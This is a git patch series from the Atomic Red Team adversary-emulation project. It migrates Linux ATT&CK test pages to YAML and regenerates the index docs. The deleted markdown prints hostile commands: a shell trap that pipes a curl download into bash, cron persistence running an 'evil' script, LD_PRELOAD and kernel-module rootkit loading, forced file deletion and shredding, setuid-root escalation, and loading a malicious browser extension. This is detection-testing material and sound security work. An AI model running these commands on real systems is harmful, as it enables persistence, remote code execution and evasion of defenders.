From 5f65f954beba32ac32577a6b89be1d1dc90c11d5 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Fri, 25 May 2018 14:16:50 -0400 Subject: [PATCH 1/2] Done YAML'd all the linux --- Linux/Defense_Evasion/File_Deletion.md | 23 ------------ Linux/Defense_Evasion/Rootkits.md | 21 ----------- Linux/Lateral_Movement/Remote_File_Copy.md | 35 ------------------- Linux/Persistence/Browser_Extensions.md | 24 ------------- Linux/Persistence/Cron_Job.md | 6 ---- .../Hidden_Files_and_Directories.md | 22 ------------ Linux/Persistence/Trap.md | 10 ------ Linux/Persistence/bash_profile_and_bashrc.md | 6 ---- .../Privilege_Escalation/Setuid_and_Setgid.md | 15 -------- atomics/T1156/T1156.yaml | 1 + atomics/T1158/T1158.yaml | 32 +++++++++++++++++ 11 files changed, 33 insertions(+), 162 deletions(-) delete mode 100644 Linux/Defense_Evasion/File_Deletion.md delete mode 100644 Linux/Defense_Evasion/Rootkits.md delete mode 100644 Linux/Lateral_Movement/Remote_File_Copy.md delete mode 100644 Linux/Persistence/Browser_Extensions.md delete mode 100644 Linux/Persistence/Cron_Job.md delete mode 100644 Linux/Persistence/Hidden_Files_and_Directories.md delete mode 100644 Linux/Persistence/Trap.md delete mode 100644 Linux/Persistence/bash_profile_and_bashrc.md delete mode 100644 Linux/Privilege_Escalation/Setuid_and_Setgid.md diff --git a/Linux/Defense_Evasion/File_Deletion.md b/Linux/Defense_Evasion/File_Deletion.md deleted file mode 100644 index c364bd5e..00000000 --- a/Linux/Defense_Evasion/File_Deletion.md +++ /dev/null @@ -1,23 +0,0 @@ -## File Deletion - -MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107) - -### Victim Configuration - - echo "This file will be shredded" > /tmp/victim-shred.txt - mkdir /tmp/victim-files - cd /tmp/victim-files - touch a b c d e f g - -### Delete a single file - - rm -f /tmp/victim-files/a - -### Delete an entire folder - - rm -rf /tmp/victim-files - -### Overwrite and delete a file with shred - - shred -u /tmp/victim-shred.txt - diff --git a/Linux/Defense_Evasion/Rootkits.md b/Linux/Defense_Evasion/Rootkits.md deleted file mode 100644 index 06becd24..00000000 --- a/Linux/Defense_Evasion/Rootkits.md +++ /dev/null @@ -1,21 +0,0 @@ -## Rootkits - -MITRE ATT&CK Technique: [T1014](https://attack.mitre.org/wiki/Technique/T1014) - -### Loadable Kernel Module based Rootkit - -Input: - - sudo insmod MODULE.ko - -OR - -Input: - - sudo modprobe MODULE.ko - -### LD_PRELOAD based Rootkit - -Input: - - export LD_PRELOAD=$PWD/libmy_r00tkit.so \ No newline at end of file diff --git a/Linux/Lateral_Movement/Remote_File_Copy.md b/Linux/Lateral_Movement/Remote_File_Copy.md deleted file mode 100644 index 288f77db..00000000 --- a/Linux/Lateral_Movement/Remote_File_Copy.md +++ /dev/null @@ -1,35 +0,0 @@ -# Remote File Copy - -MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105) - -## Adversary System Configuration -### Ensure SSH access has been configured for an adversary account - echo "This file transferred by scp" > /tmp/adversary-scp - echo "This file transferred by sftp" > /tmp/adversary-sftp - mkdir /tmp/adversary-rsync - cd /tmp/adversary-rsync - touch a b c d e f g - -## Victim System Configuration -### Ensure SSH access has been configured for a victim account -### Ensure write access for victim account to this directory - mkdir /tmp/victim-files - cd /tmp/victim-files - -## Push files to victim using rsync - rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ - -## Pull files from adversary using rsync - rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ - -## Push files to victim using scp - scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ - -## Pull file from adversary using scp - scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file - -## Push files to victim using sftp - sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' - -## Pull file from adversary using sftp - sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md deleted file mode 100644 index 3550fb8c..00000000 --- a/Linux/Persistence/Browser_Extensions.md +++ /dev/null @@ -1,24 +0,0 @@ -## Browser Extensions - -MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) - - -### Chrome (Developer Mode) - -Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. - -Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) - -Then click 'Select' - -### Chrome (Chrome Web Store) - -Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' - -### Firefox - -Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" - -Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) - -Then click 'Open' \ No newline at end of file diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md deleted file mode 100644 index 09435f6a..00000000 --- a/Linux/Persistence/Cron_Job.md +++ /dev/null @@ -1,6 +0,0 @@ -# Cron Job - -MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168) - - - echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil diff --git a/Linux/Persistence/Hidden_Files_and_Directories.md b/Linux/Persistence/Hidden_Files_and_Directories.md deleted file mode 100644 index 7a9100aa..00000000 --- a/Linux/Persistence/Hidden_Files_and_Directories.md +++ /dev/null @@ -1,22 +0,0 @@ -# Hidden Files and Directories - -MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158) - -To create visible directories and files - - mkdir visible-directory - echo "this file is visible" > visible-directory/visible-file - - # List the contents the current directory and visible directory - ls - ls visible-directory - - -To create hidden directories and files - - mkdir .hidden-directory - echo "this file is hidden" > .hidden-directory/.hidden-file - - # List the contents the current directory and hidden directory - ls -la - ls -la .hidden-directory \ No newline at end of file diff --git a/Linux/Persistence/Trap.md b/Linux/Persistence/Trap.md deleted file mode 100644 index cc3a46f4..00000000 --- a/Linux/Persistence/Trap.md +++ /dev/null @@ -1,10 +0,0 @@ -# Trap - -MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154) - - - trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT - - exit - -After exiting the shell, the script will download and execute. \ No newline at end of file diff --git a/Linux/Persistence/bash_profile_and_bashrc.md b/Linux/Persistence/bash_profile_and_bashrc.md deleted file mode 100644 index c09c8a1f..00000000 --- a/Linux/Persistence/bash_profile_and_bashrc.md +++ /dev/null @@ -1,6 +0,0 @@ -# .bash_profile and .bashrc - -MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156) - - echo "/path/to/script.py" >> ~/.bash_profile - echo "/path/to/script.py" >> ~/.bashrc diff --git a/Linux/Privilege_Escalation/Setuid_and_Setgid.md b/Linux/Privilege_Escalation/Setuid_and_Setgid.md deleted file mode 100644 index e785a5d2..00000000 --- a/Linux/Privilege_Escalation/Setuid_and_Setgid.md +++ /dev/null @@ -1,15 +0,0 @@ -# Setuid and Setgid - -MITRE ATT&CK Technique: [T1166](https://attack.mitre.org/wiki/Technique/T1166) - -Navigate to [hello.c](../Payloads/hello.c) - -Input: - - make hello - - sudo chown root hello - - sudo chmod u+s hello - - ./hello \ No newline at end of file diff --git a/atomics/T1156/T1156.yaml b/atomics/T1156/T1156.yaml index a9fdaf14..48dd19fa 100644 --- a/atomics/T1156/T1156.yaml +++ b/atomics/T1156/T1156.yaml @@ -9,6 +9,7 @@ atomic_tests: supported_platforms: - macos + - linux input_arguments: script: diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml index adf48593..95fdc5b3 100644 --- a/atomics/T1158/T1158.yaml +++ b/atomics/T1158/T1158.yaml @@ -84,3 +84,35 @@ atomic_tests: name: sh command: | defaults write com.apple.finder AppleShowAllFiles YES + +- name: Create visible Directories + description: | + xxx + + supported_platforms: + - macos + - linux + + executor: + name: sh + command: | + mkdir visible-directory + echo "this file is visible" > visible-directory/visible-file + ls + ls visible-directory + +- name: Create hidden directories and files + description: | + xxx + + supported_platforms: + - macos + - linux + + executor: + name: sh + command: | + mkdir .hidden-directory + echo "this file is hidden" > .hidden-directory/.hidden-file + ls -la + ls -la .hidden-directory From 71023f23cfaefc56c63b9d4dabf0955fdc0bbd60 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 25 May 2018 18:17:01 +0000 Subject: [PATCH 2/2] Generate docs from job=validate_atomics_generate_docs branch=Linux-completion --- atomics/T1156/T1156.md | 2 +- atomics/T1158/T1158.md | 36 ++++++++++++++++++++++++++++++++++++ atomics/index.md | 6 +++++- atomics/linux-index.md | 5 +++++ atomics/macos-index.md | 6 +++++- 5 files changed, 52 insertions(+), 3 deletions(-) diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md index 5a5f8439..3dbda9a2 100644 --- a/atomics/T1156/T1156.md +++ b/atomics/T1156/T1156.md @@ -24,7 +24,7 @@ Permissions Required: User, Administrator ## Atomic Test #1 - .bash_profile and .bashrc xxx -**Supported Platforms:** macOS +**Supported Platforms:** macOS, Linux #### Inputs diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md index 988733be..8e8314bd 100644 --- a/atomics/T1158/T1158.md +++ b/atomics/T1158/T1158.md @@ -41,6 +41,10 @@ Permissions Required: User - [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files) +- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories) + +- [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files) +
@@ -127,3 +131,35 @@ xxx defaults write com.apple.finder AppleShowAllFiles YES ```
+
+ +## Atomic Test #7 - Create visible Directories +xxx + +**Supported Platforms:** macOS, Linux + + +#### Run it with `sh`! +``` +mkdir visible-directory +echo "this file is visible" > visible-directory/visible-file +ls +ls visible-directory +``` +
+
+ +## Atomic Test #8 - Create hidden directories and files +xxx + +**Supported Platforms:** macOS, Linux + + +#### Run it with `sh`! +``` +mkdir .hidden-directory +echo "this file is hidden" > .hidden-directory/.hidden-file +ls -la +ls -la .hidden-directory +``` +
diff --git a/atomics/index.md b/atomics/index.md index 4af93d2a..0bf6845b 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -1,7 +1,7 @@ # All Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos] + - Atomic Test #1: .bash_profile and .bashrc [macos, linux] - [T1015 Accessibility Features](./T1015/T1015.md) - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) @@ -37,6 +37,8 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] + - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1179 Hooking](./T1179/T1179.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] - [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) @@ -167,6 +169,8 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] + - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1147 Hidden Users](./T1147/T1147.md) - Atomic Test #1: Hidden Users [macos] - [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) diff --git a/atomics/linux-index.md b/atomics/linux-index.md index 1eeb45d1..4f199149 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -1,6 +1,7 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) + - Atomic Test #1: .bash_profile and .bashrc [macos, linux] - [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1176 Browser Extensions](./T1176/T1176.md) - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] @@ -11,6 +12,8 @@ - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] + - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1168 Local Job Scheduling](./T1168/T1168.md) - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] @@ -128,6 +131,8 @@ - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] + - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1070 Indicator Removal on Host](./T1070/T1070.md) - Atomic Test #3: rm -rf [macos, linux] diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 5c0868e6..226b96b4 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -1,7 +1,7 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos] + - Atomic Test #1: .bash_profile and .bashrc [macos, linux] - [T1176 Browser Extensions](./T1176/T1176.md) - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] @@ -16,6 +16,8 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] + - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1159 Launch Agent](./T1159/T1159.md) @@ -190,6 +192,8 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] + - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1147 Hidden Users](./T1147/T1147.md) - Atomic Test #1: Hidden Users [macos] - [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)